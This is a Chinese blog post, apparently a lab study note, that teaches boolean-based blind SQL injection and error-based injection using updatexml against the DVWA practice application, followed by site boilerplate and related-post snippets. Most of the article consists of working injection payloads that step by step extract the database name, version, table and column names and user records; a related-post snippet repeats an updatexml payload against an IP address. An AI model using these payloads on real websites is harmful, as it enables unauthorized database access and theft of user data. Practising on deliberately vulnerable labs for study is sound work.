web安全 sql盲注和报错注入

已于 2022-06-13 20:13:28 修改
阅读量779 收藏 3
点赞数 1
文章标签: web安全 sql 安全
于 2022-06-13 20:11:38 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_68167825/article/details/125260875
版权

文章目录

前言

在SQL注入过程中,SQL语句执行后,选择的数据不能回显到前端页面,此时需要利用一些方法进行判断或者尝试,这个过程称之为盲注。
在盲注中,攻击者根据其返回页面的不同来判断信息(可能是页面内容的不同,也可以是响应时间不同)。一般情况下,盲注可分为两类:
基于布尔的盲注(Boolean based)

提示:以下是本篇文章正文内容,下面案例可供参考

一、基于布尔的盲注

length():功能:返回字符串的长度,以字节为单位。

可以基于这个函数,实现盲注。
例:
在这里插入图片描述在这里插入图片描述在这里插入图片描述
输入1’ and length(database())>3 – -得到了结果没有报错,所以可以得到数据库名字节数大于3,
输入1’ and length(database())>4 – -得到了结果报错,所以得到数据库名字节数不大于4,
输入1’ and length(database())=4 – -得到结果没报错,所以得到数据库名字节数为4.

substr():功能:从指定的位置开始,截取字符串指定长度的子串。
ascii():功能:返回字符串最左边字符的ASCII码值

根据这两个函数得作用,来做盲注猜测。
在这里插入图片描述在这里插入图片描述在这里插入图片描述输入1’ and ascii(substr(database(),1,1))>99 – -得到结果没有报错,所以第一个字节ASCII码值大于99,
输入1’ and ascii(substr(database(),1,1))>100 – -得到结果报错,所以第一个字节ASCII码值不大于100,
输入1’ and ascii(substr(database(),1,1))=100 – -得到结果没有报错,所以第一个字节ASCII码值为100.

在这里插入图片描述输入1’ and ascii(substr(database(),2,1))=118 – -得到结果没有报错,所以第二个字节ASCII码值为118
在这里插入图片描述输入1’ and ascii(substr(database(),3,1))=119 – -得到结果没有报错,所以第二个字节ASCII码值为119
在这里插入图片描述输入1’ and ascii(substr(database(),4,1))=97 – -得到结果没有报错,所以第二个字节ASCII码值为97

在这里插入图片描述
跟据得到的ASCII码值:100.118.119.97与ASCII表对应,得到了数据库名为dvwa

这个就是基于布尔盲注的思路,因后面步骤一般使用自动化脚本,所以这里就演示到这里。

三、报错注入

在这里插入图片描述
在这里插入图片描述

输入:1’ union select updatexml(1,concat(0x5e,(select database()),0x5e),1) – -
1’ union select updatexml(1,concat(0x5e,(select version()),0x5e),1) – -
通过报错回显,得到了数据库名为“dvwa”,数据库版本为“5.7.26”。

在这里插入图片描述

爆库,输入:
1’ and updatexml(1,concat(0x5e,(select group_concat(table_name) from information_schema.tables where table_schema=‘dvwa’),0x5e),1) – -
通过报错回显,得到了dvwa库下的两个表

在这里插入图片描述

爆表,输入:1’ and updatexml(1,concat(0x5e,(select group_concat(column_name) from information_schema.columns where table_schema=‘dvwa’ and table_name=‘users’),0x5e),1) – -
通过之前爆库下的两个表,猜测users表可能有敏感数据,通过爆users表得到了他里面的字段名。

在这里插入图片描述

报数据,输入:1’ and updatexml(1,concat(0x5e,(select group_concat(first_name,0x3e,last_name) from users),0x5e),1) – -
爆出来敏感数据。

鲨鱼辣椒yyy
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
盲注
weixin_53026460的博客
10-24 3095
盲注属于SQL注入的一种,SQL注入可以通过不同的类别来分类,比如按照传参方式分类SQL注入:GET、POST、HEAD(COOKIE),根据做法的不同,我们也可以把这些分类为盲注报错注入和显错注入;盲注是什么?(一)布尔盲注布尔是一种类型,核心是在于判断正确与否。布尔就是指这个页面有回显,但是不会显示具体内容,只会显示语句是否正常执行;举个例子,这是一条存在sql注入的语句;在这里输入and 1=1;会发现页面显示有数据;将and 1=1修改为and 1=1;
SQL注入之盲注
xiao_he0123的博客
03-20 6982
SQL注入之盲注前言一、盲注分类二、具体解析1.基于布尔的sql盲注首先要先了解一下sql注入截取字符串常用的函数:(1)mid()函数(2)substr()函数(3)left()函数具体注入方法2.基于时间的SQL盲注3.基于报错的SQL盲注1.extractvalue()函数2.uodatexml()函数3.floor()函数 前言 何为盲注盲注就是在 sql 注入过程中,sql 语句执行的选择后,选择的数据不能回显 到前端页面 一、盲注分类 盲注分为三类: (1)基于布尔的SQL盲注 (2)基于事
HCIE(6)——SQL注入(报错型注入、布尔型盲注、时间型盲注
qq_45782298的博客
11-02 550
一、报错型SQL注入 报错型SQL注入与SQL注入的前三步是一致的,但是数据没有回显位,也就是说即使构造语句成功我们也没有办法看到数据的显示。但是如果SQL语句出现错误可以回显在页面上,我们就可以利用这点来构造报错显示的SQL语句。 下面是利用count(*),FLOOR(RAND(0)*2),group by报错 AND(SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT(SELECT CONCAT(CAST(DATABASE() AS CHAR),0x7e))
web ------ SQL注入------盲注
L0g1c的博客
07-20 246
有时目标存在注入,但是页面上没有任何回显,此时,我们需要利用一些方法进行判断或者尝试得到数据,这个过程称之为盲注
Sql注入学习笔记(5~6)两关教会你:布尔+报错注入
qq_47704742的博客
09-14 1670
sql-labs less 5怎么打? 这一篇, 让你学会布尔+报错盲注
Web应用安全Sqlserver盲注.pptx
06-19
SQL盲注就是在 sql 注入过程中,sql 语句执行的选择后,选择的数据不能回显 到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个过程称之为盲注盲注分为三类: 1)基于布尔 SQL 盲注。 2)基于时间的 ...
网络安全原理与应用:SQL盲注.pptx
05-16
SQL盲注,与一般注入的区别在于,一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知,因此盲注的难度要比一般注入高...
Web安全SQL注入精讲视频.zip
04-16
2-4 报错注入.mp4 2-5 双注入.mp4 2-6 布尔盲注.mp4 2-7 时间盲注.mp4 2-8 Cookie注入.mp4 2-9 HTTP-Referer注入.mp4 3-1 绕过注释符过滤.mp4 3-2 绕过and-or字符过滤.mp4 3-3 绕过空格过滤.mp4 3-4 内联注释绕过....
sql注入 自学笔记 报错注入 二阶注入 布尔时间盲注 基于sqli-labs
02-19
报错注入是指攻击者通过构造特定的SQL语句,让攻击者想要查询的信息通过页面的错误提示回显出来。报错注入一般需要具备两个前提条件: 1. Web应用程序未关闭数据库报错函数,对于一些SQL语句的错误直接回显在页面上...
Web应用安全:Mysql盲注文本.docx
06-17
一、什么是SQL盲注 盲注就是在 sql 注入过程中,sql 语句执行的选择后,选择的数据不能回显 到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个过程称之为盲注盲注分为三类: 基于布尔 SQL 盲注 基于...
4-Web安全——SQL盲注
网络安全
05-23 768
1. SQL盲注 在进行SQL注入过程中,如果当前页面没有报错回显,无法获取数据库返回结果的情况下,可以通过SQL盲注的方式对数据库中的内容进行猜解,盲注类型主要分为:布尔盲注和时间盲注。 当web页面只返回真假(true或false)两种不同类型的结果情况下,利用页面返回的不同类型结果逐个猜解数据,就可以使用布尔盲注,如果web页面不返回true或false类型的结果,则可以使用时间注入。 真实的注入环境中,web页面肯定不会直接回显true或false的,一般来说可以根据页面返回的结果作为依.
WEB渗透学习笔记3——报错注入盲注
林林木林林L的博客
07-23 650
报错注入 报错注入原理 在MYSQL中使用一些指定的函数来制造报错,后台没有屏蔽数据库报错信息,在语法发生错误时会输出在前端,从而从报错信息中获取设定的信息。select/insert/update/delete都可以使用报错来获取信息 常用的报错函数 updatexml() updatexml()函数是MYSQL对XML文档数据进行查询和修改的XPATH函数; and updatexml(xml_document,Xpathstring,new_value) updatexml(1,concat(0
SQL注入之时间盲注报错注入sql-lab第一关为例)
_Co1a
12-22 786
什么是时间盲注 时间盲注指通过页面执行的时间来判断数据内容的注入方式,通常用于数据(包含逻辑型)不能返回到页面中的场景,无法利用页面回显判断数据内容,只能通过执行的时间来获取数据。 时间盲注的过程 1、找到注入点,并选择合适的注入语句 2、爆破 这里以sqli-lab第九关为例 192.168.3.10/sqli/Less-9/?id=1拿不到明显的回显(You are in…) 192.168.3.10/sqli/Less-9/?id=1’ --+ 也拿不到明显的回显(You are in…) 192.1
SQL注入漏洞测试(报错盲注)
qq_36933272的博客
08-31 1119
1.判断注入,输入’显示语法错误说明有注入点 2.爆数据库 http://219.153.49.228:44996/new_list.php?id=1’ and updatexml(1,concat(0x7e,(select database()),0x7e),1)–+ 3.爆表 http://219.153.49.228:44996/new_list.php?id=1’ and updatexm...
盲注报错注入、宽字节注入、堆叠注入学习笔记
qq_42562304的博客
06-15 567
基于布尔的盲注: 传入“”错误“”参数和“正确”参数,观察页面是否发生了变化。 基于时间的盲注: 有些数据库对错误信息做了安全配置,是的无法通过以上方式(即页面返回的真假)探测注入点。此时,可以通过设置sleep语句(延迟多长时间,判断后台执行的时间)来探测注入点,称为基于时间的盲注。 补充函数: ASCII码对照表: 判断DVWA靶场盲注这关的库名: 可以判断为基于布尔的盲注。以下为通过ascii函数爆库名: 说明库的第一个字符ascci码为100,查表后得到第一个字符为d。重复以上步骤,可以得出当前
常见的Web漏洞——SQL注入
热门推荐
江左盟的博客
06-25 12万+
目录 SQL注入简介 SQL注入原理 SQL注入分类及判断 SQL注入方法 联合查询注入 基于bool的盲注 基于时间的盲注 总结 SQL注入简介 SQL注入是网站存在最多也是最简单的漏洞,主要原因是程序员在开发用户和数据库交互的系统时没有对用户输入的字符串进行过滤,转义,限制或处理不严谨,导致用户可以通过输入精心构造的字符串去非法获取到数据库中的数据。本文以免费开源数据库My...
WEB安全实战(一)SQL盲注
紫羽风的博客
10-30 3万+
前言 好长时间没有写过东西了,不是不想写,只不过是一直静不下心来写点东西。当然,拖了这么长的时间,也总该写点什么的。最近刚刚上手安全方面的东西,作为一个菜鸟,也本着学习的目的,就谈谈最近接触到的安全方面的问题吧。 背景 既然提到了背景,那我们就简单的带一下,最近互联网上爆出了各种惊人的事件、各种门、各种照的,归根结底,都是网络安全出的问题,有的是网络被别人监控
Sql盲注与普通注入的区别
过客璇璇的博客
03-12 3万+
Sql盲注与普通注入的区别 在学习sql注入的时候,好多同学都是不弄清楚原理,去浏览器上狂搜一下注入语句,就开始对老师给的靶机注入,虽然能注入成功,但是不清楚原理,对以后的学习和工作没有多大的好处。现在我就讲一下sql盲注与普通注入的区别! 首先,何为sql盲注?可能这个问题一下子就把你问蒙蔽了。 盲注就是在sql注入过程中,sql语句执行的选择后,选择的...
sql盲注报错注入(附自动化脚本)
最新发布
05-22
报错注入是一种SQL注入的方式,它利用了数据库返回错误信息的特性,通过构造特定的SQL语句来达到获取信息的目的。 以下是一个简单的报错注入示例: 假设有一个登录页面,用户需要输入用户名和密码才能登录。页面的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值